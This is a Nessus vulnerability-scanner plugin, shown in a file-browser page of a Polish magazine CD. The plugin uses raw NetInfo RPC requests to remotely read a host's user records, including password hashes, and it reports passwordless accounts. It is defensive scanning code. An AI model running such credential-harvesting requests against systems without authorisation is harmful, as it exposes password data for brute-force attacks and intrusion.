home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / netinfo_passwd.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  9.2 KB  |  397 lines
  1. #
  2. # This script is (C) Tenable Network Security
  3. #
  4.  
  5. if(description)
  6. {
  7.  script_id(11898);
  8.  script_bugtraq_id(2953);
  9.  script_version("$Revision: 1.7 $");
  10.  
  11.  name["english"] = "Obtain /etc/passwd using NetInfo";
  12.  
  13.  script_name(english:name["english"]);
  14.  
  15.  desc["english"] = "
  16. This script attempts to read the password file of the remote
  17. host by using NetInfo.";
  18.  
  19.  
  20.  script_description(english:desc["english"]);
  21.  
  22.  summary["english"] = "Uses NetInfo to read /etc/passwd remotely";
  23.  
  24.  script_summary(english:summary["english"]);
  25.  
  26.  script_category(ACT_GATHER_INFO);
  27.  
  28.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  29.  family["english"] = "General";
  30.  script_family(english:family["english"]);
  31.  script_dependencies("rpc_portmap.nasl", "netinfo_detect.nasl");
  32.  exit(0);
  33. }
  34.  
  35. function get_rpc_port(protocol)
  37.  local_var    broken, req, soc, r, port;
  38.  local_var    a, b, c, d, p_a, p_b, p_c, p_d, pt_a, pt_b, pt_c, pt_d;
  39.  
  40.  
  41.  
  42.  a = rand() % 255;
  43.  b = rand() % 255;
  44.  c = rand() % 255;
  45.  d = rand() % 255;
  46.  
  47.  p_a = program / 16777216;     p_a = p_a % 256;
  48.  p_b = program / 65356;     p_b = p_b % 256;
  49.  p_c = program / 256;       p_c = p_c % 256;
  50.  p_d = program % 256;
  51.  
  52.  pt_a = protocol / 16777216; pt_a = pt_a % 256;
  53.  pt_b = protocol / 65535   ; pt_b = pt_b % 256;
  54.  pt_c = protocol / 256;    ; pt_c = pt_c % 256;
  55.  pt_d = protocol % 256;
  56.  
  57.  
  58.  req = raw_string(a,     b,     c,     d,     # XID
  59.            0x00, 0x00, 0x00, 0x00,    # Msg type: call
  60.           0x00, 0x00, 0x00, 0x02,    # RPC Version
  61.           0x00, 0x01, 0x86, 0xA0,    # Program
  62.           0x00, 0x00, 0x00, 0x02,    # Program version
  63.           0x00, 0x00, 0x00, 0x03,    # Procedure
  64.           0x00, 0x00, 0x00, 0x00,    # Credentials - flavor
  65.           0x00, 0x00, 0x00, 0x00,     # Credentials - length
  66.           0x00, 0x00, 0x00, 0x00,    # Verifier - Flavor
  67.           0x00, 0x00, 0x00, 0x00,    # Verifier - Length
  68.           
  69.           0x0b, 0xed, 0x48, 0xa1,    # Program
  70.           0xFF, 0xFF, 0xFF, 0xFF,    # Version (any)
  71.           pt_a, pt_b, pt_c, pt_d,    # Proto (udp)
  72.           0x00, 0x00, 0x00, 0x00    # Port
  73.            );
  74.     
  75.       
  76.   port = int(get_kb_item("rpc/portmap"));
  77.   if(port == 0)port = 111;
  78.        
  79.       
  80.  broken = get_kb_item(string("/tmp/rpc/noportmap/", port));
  81.  if(broken)return(0);
  82.  
  83.        
  84.  soc = open_sock_udp(port);
  85.  send(socket:soc, data:req);
  86.  r = recv(socket:soc, length:1024);
  87.  
  88.  close(soc);
  89.  if(!r)
  90.  {
  91.   set_kb_item(name:string("/tmp/rpc/noportmap/", port), value:TRUE);
  92.   return(0);
  93.  }
  94.  
  95.  if(strlen(r) < 28)
  96.   return(0);
  97.  else
  98.   {
  99.    p_d = ord(r[27]);
  100.    p_c = ord(r[26]);
  101.    p_b = ord(r[25]);
  102.    p_a = ord(r[24]);
  103.    port = p_a;
  104.    port = port * 256;
  105.    port = port +p_b; 
  106.    port = port * 256;
  107.    port = port + p_c; 
  108.    port = port * 256;
  109.    port = port + p_d;
  110.    return(port);
  111.   }
  112. }
  113.  
  114.  
  115.  
  116.  
  117.  
  118. function netinfo_recv(socket)
  119. {
  120.  local_var buf, len;
  121.  
  122.  buf = recv(socket:soc, length:4);
  123.  if(strlen(buf) < 4)return NULL;
  124.  
  125.  len = ord(buf[3]) + ord(buf[2])*256;
  126.  
  127.  buf += recv(socket:soc, length:len);
  128.  return buf;
  129. }
  130.  
  131.  
  132. function decode_strings(reply)
  133. {
  134.  local_var len, pad, start;
  135.  local_var ret, str, value;
  136.  
  137.  ret = make_list();
  138.  start = 46;
  139.   
  140.  while ( TRUE )
  141.  {
  142.  if(start > strlen(reply))break;
  143.  len = ord(reply[start]) * 256 + ord(reply[start+1]);
  144.  start += 2;
  145.  str = substr(reply, start, start + len - 1);
  146.  if( strlen(str) % 4 ) pad = 4 - strlen(str) % 4;
  147.  else pad = 0;
  148.  start += len + 6 + pad;
  149.  len = ord(reply[start]) * 256 + ord(reply[start+1]);
  150.  start += 2;
  151.  value = substr(reply, start, start + len - 1);
  152.  if( strlen(value) % 4 ) pad = 4 - strlen(value) % 4;
  153.  else pad = 0;
  154.  start += len + 2 + pad;
  155.  ret[str] = value;
  156.  }
  157.  return ret;
  158.  
  159. }
  160.  
  161.  
  162. report = "";
  163. passwdless = "";
  164.  
  165.  
  166. rpcport = get_rpc_port(protocol:IPPROTO_TCP);
  167. if ( rpcport && get_port_state(rpcport))
  168. {
  169.  soc = open_sock_tcp(rpcport);
  170.  if (  soc ) 
  171.  {
  172.   req = raw_string(0x80, 0x00, 0x00, 0x28, 0x11, 0xe0, 0x40, 0x95,
  173.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  174.          0x0b, 0xed, 0x48, 0xa1, 0x00, 0x00, 0x00, 0x01,
  175.          0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
  176.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  177.          0x00, 0x00, 0x00, 0x00);
  178.  
  179.  send(socket:soc, data:req);
  180.  r = netinfo_recv(socket:soc);
  181.  close(soc);
  182.  if(strlen(r) > 35)
  183.  {
  184.   num_domains = ord(r[35]);
  185.   start = 38;
  186.   for ( i = 0 ; i < num_domains ; i ++ )
  187.    {
  188.    if(start > strlen(r))break;
  189.    len = ord(r[start]) * 256 + ord(r[start+1]);
  190.    start += 2;
  191.    domain[i] = substr(r, start, start + len - 1);
  192.    start += len + 10;
  193.    if(len % 4)start += 4 - (len % 4);
  194.    }
  195.   }
  196.  }
  197. }
  198.  
  199. rpcport = get_rpc_port(protocol:IPPROTO_UDP);
  200. flag = 0;
  201. if ( rpcport )
  202. {
  203.  for ( n = 0 ; n < num_domains ; n ++ )
  204.  {
  205.  soc = open_sock_udp(rpcport);
  206.  l_lo = strlen(domain[n]) % 256;
  207.  l_hi = strlen(domain[n]) / 256;
  208.  r = raw_string(0x68, 0xc1, 0x58, 0x98, 0x00, 0x00, 0x00, 0x00,
  209.         0x00, 0x00, 0x00, 0x02, 0x0b, 0xed, 0x48, 0xa1,
  210.         0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
  211.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  212.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  213.         0x00, 0x00, l_hi, l_lo) + domain[n];
  214.  if(strlen(domain[n]) % 4)r += crap(data:raw_string(0), length:4-(strlen(domain[n]) % 4));
  215.  send(socket:soc, data:r);
  216.  r = recv(socket:soc, length:4096);
  217.  close(soc);
  218.  if ( !r ) break;
  219.  else flag = 1;
  220.  
  221.  port = ord(r[strlen(r) - 2]) * 256 + ord(r[strlen(r) - 1]);
  222.  domain_port[domain[n]] = port;
  223.  }
  224. }
  225.  
  226. #
  227. # If we can not connect to nibindd, then we brute force
  228. # our way by connecting to every port on which we KNOW that
  229. # netinfo is listening.
  230. #
  231. if ( ! flag )
  232. {
  233.  ports = get_kb_list("Services/netinfo");
  234.  if(isnull(ports))exit(0);
  235.  else ports = make_list(ports);
  236.  foreach p (ports)
  237.  {
  238.   domain_port["unknown_on_port_" + string(p)] = p;
  239.  }
  240. }
  241.  
  242. foreach dom (keys(domain_port))
  243. {
  244.  port = domain_port[dom];
  245.  if ( get_port_state(port) )
  246.  {
  247.  soc = open_sock_tcp(port);
  248.  if( soc ) 
  249.  {
  250.  req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x80,
  251.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  252.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  253.          0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
  254.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  255.          0x00, 0x00, 0x00, 0x00);
  256.  
  257. send(socket:soc, data:req);
  258. r = netinfo_recv(socket:soc);
  259.  
  260.  
  261.  
  262. req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x7f,
  263.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  264.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  265.          0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
  266.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  267.          0x00, 0x00, 0x00, 0x00);
  268.  
  269. send(socket:soc, data:req);
  270. r = netinfo_recv(socket:soc);
  271.  
  272.  
  273.  
  274. #
  275. # Request the users map
  277.  
  278. req = raw_string(0x80, 0x00, 0x00, 0x44, 0x15, 0xeb, 0x49, 0x7e,
  279.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  280.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  281.          0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00,
  282.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  283.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  284.          0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04,
  285.              0x6e, 0x61, 0x6d, 0x65, 0x00, 0x00, 0x00, 0x05,
  286.          0x75, 0x73, 0x65, 0x72, 0x73, 0x00, 0x00, 0x00);
  287.  
  288. send(socket:soc, data:req);
  289. r = netinfo_recv(socket:soc);
  290.  
  291. if ( r )
  292. {
  293. req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7d,
  294.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  295.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  296.          0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
  297.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  298.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
  299.          0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));
  300.  
  301. send(socket:soc, data:req);
  302. r = netinfo_recv(socket:soc);
  303. }
  304.  
  305. if ( r )
  306. {
  307. req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7c,
  308.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  309.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  310.          0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00,
  311.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  312.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
  313.          0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));
  314.  
  315.  
  316. send(socket:soc, data:req);
  317. r = netinfo_recv(socket:soc);
  318. }
  319.  
  320. if(strlen(r) > 35)
  321.  {
  322. num_users = ord(r[35]);
  323.  
  324.  
  325. j = 0;
  326. for(i=0;i<num_users*4;i+=4)
  327. {
  328.  if(40 + i > strlen(r))break;
  329.  users[j] = substr(r, 36 + i, 39 + i);
  330.  j++;
  331. }
  332.  
  333. users[j] = NULL;
  334.  
  335. for ( i = 0 ; i < num_users ; i ++ )
  336. {
  337.  req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7b,
  338.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
  339.           0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
  340.           0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00,
  341.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  342.           0x00, 0x00, 0x00, 0x00) + users[i] + raw_string(
  343.           0x00, 0x00, 0x00, 0x0c);
  344.  send(socket:soc, data:req);
  345.  r = netinfo_recv(socket:soc);
  346.  user = decode_strings(reply:r);
  347.  if(user["name"] && user["uid"])
  348.  {
  349.  if ( flag == 0 )
  350.  {
  351.  report += ". In domain '" + dom + "' :
  352.  
  353. ";
  354.  flag = 1;
  355.  }
  356.   
  357.  report += string(user["name"], ":", user["passwd"], ":", user["uid"], ":", user["gid"], ":", user["realname"], ":", user["home"], ":", user["shell"], "\n");
  358.  if(strlen(user["passwd"]) == 0 )
  359.   {
  360.   passwdless += '  . ' + user["name"] + '\n';
  361.   }
  362.  }
  363.  }
  364.  }
  365.  }
  366. }
  367.  flag = 0;
  368.  
  369. }
  370.  
  371.  
  372.  
  373. if(strlen(report))
  374. {
  375.  report = "
  376. Using NetInfo, it was possible to obtain the password file of the remote host
  377. by querying it directly. The content of this file is :
  378.  
  379. " + report + "
  380.  
  381. An attacker may use it to set up a brute force attack to crack the 
  382. passwords contained in the file, and then use the gained passwords to
  383. login into the remote host, either remotely or locally";
  384.  
  385.  
  386.  
  387. if(strlen(passwdless)) 
  388. {
  389.  report += "
  390.  
  391. Note that the following accounts have NO PASSWORD set :
  392. " + passwdless;
  393.     }
  394.  
  395.  security_hole(port:port, data:report);
  396.  }
  397.